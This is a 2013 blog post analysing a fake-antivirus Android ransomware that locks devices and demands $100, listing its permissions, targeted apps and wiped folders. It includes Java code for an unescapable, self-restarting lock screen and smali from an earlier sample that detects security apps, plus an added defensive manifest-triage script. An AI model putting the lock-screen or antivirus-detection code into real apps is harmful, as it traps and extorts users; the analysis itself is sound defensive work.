New Android malware discovered posing as antivirus software and hijacking devices
2013-06-25 10:33
[Android malware: pay $100 or your private data is leaked] June 25 news: security firm Symantec has published a report on new malware discovered on the Android platform that poses as antivirus software and hijacks the device; the victim must pay $100 before the device will work normally again. The malware plays on users' desire for security, tricking them into "removing" fake or nonexistent trojans, and then takes control of the whole device to intimidate its owner.
Also, this app is not distributed through Google Play, so be careful about where you get your software: do not install apps from unknown sources, download them from legitimate app stores instead!
Where software comes from is the most fundamental question in smart-device security!!
Actually there have been samples like this before, forcing users to "donate"... for example the code below:
import android.app.Activity;
import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import android.view.KeyEvent;
class MaliciousActivity extends Activity {
    @Override // swallow every key press, so Back cannot leave this screen
    public boolean onKeyDown(int keyCode, KeyEvent event) { return true; }
    @Override // when the activity is destroyed, start a service that revives it
    protected void onDestroy() {
        super.onDestroy();
        startService(new Intent(getApplicationContext(), RestartService.class));
    }
}
class RestartService extends Service {
    @Override // the service immediately relaunches the activity in a new task
    public void onCreate() {
        super.onCreate();
        startActivity(new Intent(getApplicationContext(), MaliciousActivity.class)
                .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
    }
    @Override public IBinder onBind(Intent intent) { return null; }
}
The code above is for illustration only; do not try to reproduce it in practice.
Below is this ransomware's interface:
It dresses itself up like a Saint Seiya hero, flags a whole pile of threats at once, and then demands protection money...
Package name: com.android.defender.androiddefender
The home-screen icon after installation:
Requested permissions: damn, that's a lot of them
Access location information, such as Cell-ID or WiFi.
Access location information, such as GPS information.
Access information about networks.
Access information about the WiFi state.
Change network connectivity state.
Change Wi-Fi connectivity state.
Allows applications to disable the keyguard (disable the lock screen).
Expand or collapse the status bar.
Access to the list of accounts in the Accounts Service.
Open network connections.
Ends background processes (kill other processes).
Read user's contacts data.
Check the phone's current state.
Read SMS messages on the device.
Start once the device has finished booting (auto-start).
Open windows.
Make the phone vibrate.
Prevent processor from sleeping or screen from dimming.
Create new contact data.
Write to external storage devices.
Create new SMS messages.
Install a shortcut.
It also activates device administration...
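As an added example (not code from this post or from the sample), a small triage script that parses a decoded AndroidManifest.xml and flags the permission combination listed above together with a device-admin receiver; the manifest, the weights and the verdict threshold are constructed assumptions.

```python
"""Triage a decoded AndroidManifest.xml for the traits listed above: lock-screen
control, killing other apps, boot persistence, SMS access, device-admin receiver.
Added example, not the sample's code; weights and threshold are assumptions."""
import xml.etree.ElementTree as ET
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# permission -> (trait it enables, weight); weights are an analyst's assumption
SUSPECT_PERMS = {
    "android.permission.DISABLE_KEYGUARD": ("lock-screen control", 3),
    "android.permission.SYSTEM_ALERT_WINDOW": ("overlay windows", 2),
    "android.permission.KILL_BACKGROUND_PROCESSES": ("kills other apps", 3),
    "android.permission.RECEIVE_BOOT_COMPLETED": ("boot persistence", 1),
    "android.permission.READ_SMS": ("reads SMS", 2),
    "android.permission.WRITE_SMS": ("writes SMS", 2),
    "android.permission.WRITE_EXTERNAL_STORAGE": ("can delete downloads", 1),
}
THRESHOLD = 8  # assumed cut-off for the "ransomware-like" verdict

def triage_manifest(xml_text):
    root = ET.fromstring(xml_text)
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    traits = {SUSPECT_PERMS[p][0]: SUSPECT_PERMS[p][1]
              for p in perms if p in SUSPECT_PERMS}
    # A receiver protected by BIND_DEVICE_ADMIN is how an app registers as a
    # device administrator; once active, a plain uninstall is refused.
    if any(r.get(ANDROID_NS + "permission") == "android.permission.BIND_DEVICE_ADMIN"
           for r in root.iter("receiver")):
        traits["device-admin receiver"] = 3
    score = sum(traits.values())
    return {"package": root.get("package"), "traits": traits, "score": score,
            "verdict": "ransomware-like" if score >= THRESHOLD else "review"}

# Constructed manifest modelled on the permission list above (not the real one).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeav">
  <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
  <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
```

Run it against the output of an APK decoder (the binary manifest must be decoded to plain XML first); the verdict is only a triage hint, not a classification.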
It deletes the APKs in these directories... presumably to stop the user from downloading antivirus software?
[EXTERNAL STORAGE MEDIA]/Download
/mnt/external_sd/Download
/mnt/extSdCard/Download
It creates a SQLite database, droidbackup.db, to steal the system's SMS messages.
This screen pops up when the device is locked... the charlatan!!!
It kills off all of these other apps' processes!
com.rechild.advancedtaskkiller
com.estrongs.android.pop
com.metago.astro
com.avast.android.mobilesecurity
com.estrongs.android.taskmanager
com.gau.go.launcherex.gowidget.taskmanagerex
com.gau.go.launcherex
com.rechild.advancedtaskkillerpro
mobi.infolife.taskmanager
com.rechild.advancedtaskkillerfroyo
com.netqin.aotkiller
com.arron.taskManagerFree
com.rhythm.hexise.task
And then... damn, my test device is "severely infected", with every one of the world's most popular threats!
Now it starts asking for money!!!
At a discount, even...
It is hard to uninstall and blocks other apps from launching; earlier malware already did this. Here is code from one of those earlier samples!
.method public static b(Landroid/content/Context;)Ljava/lang/String;
    .locals 4
    const/4 v2, 0x0
    # the encrypted regular expression matching the package names of security software:
    # (^com\.qihoo360\.mobilesafe$)|(^com\.tencent\.qqpimsecure$)|(^com\.lbe\.security$)
    const-string v0, "ZkBw8CLr9ek1HtMhfN7YKvBg8CF18t3N7xzRFvRAZkBw8CLr9eiR8I0R8eir9eksrtRgrC3wuKFRFvRAZkBw8CLr9IsWz3YOrC3wuKF1uoDDZl__"
    # decrypt the string
    invoke-static {v0}, Lcom/sec/android/providers/drm/However;->d(Ljava/lang/String;)Ljava/lang/String;
    move-result-object v0
    invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
    move-result-object v1
    invoke-virtual {v1, v2}, Landroid/content/pm/PackageManager;->getInstalledPackages(I)Ljava/util/List;
    move-result-object v1
    :goto_0
    invoke-interface {v1}, Ljava/util/List;->size()I
    move-result v3
    # traverse the list of installed packages (v2 is the loop index)
    if-ge v2, v3, :cond_1
    invoke-interface {v1, v2}, Ljava/util/List;->get(I)Ljava/lang/Object;
    move-result-object p0
    check-cast p0, Landroid/content/pm/PackageInfo;
    iget-object v3, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
    # a(packageName, regex) returns null when the package name does not match
    invoke-static {v3, v0}, Lcom/sec/android/providers/drm/However;->a(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
    move-result-object v3
    if-eqz v3, :cond_0
    iget-object v0, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
    :goto_1
    # security software found: return its package name
    return-object v0
    :cond_0
    # otherwise, check the next package
    add-int/lit8 v2, v2, 0x1
    goto :goto_0
    :cond_1
    # nothing matched: return null
    const/4 v0, 0x0
    goto :goto_1
.end method
It even modifies system settings so that not even a factory data reset works. Source-code analysis of the latter two will follow in a later post.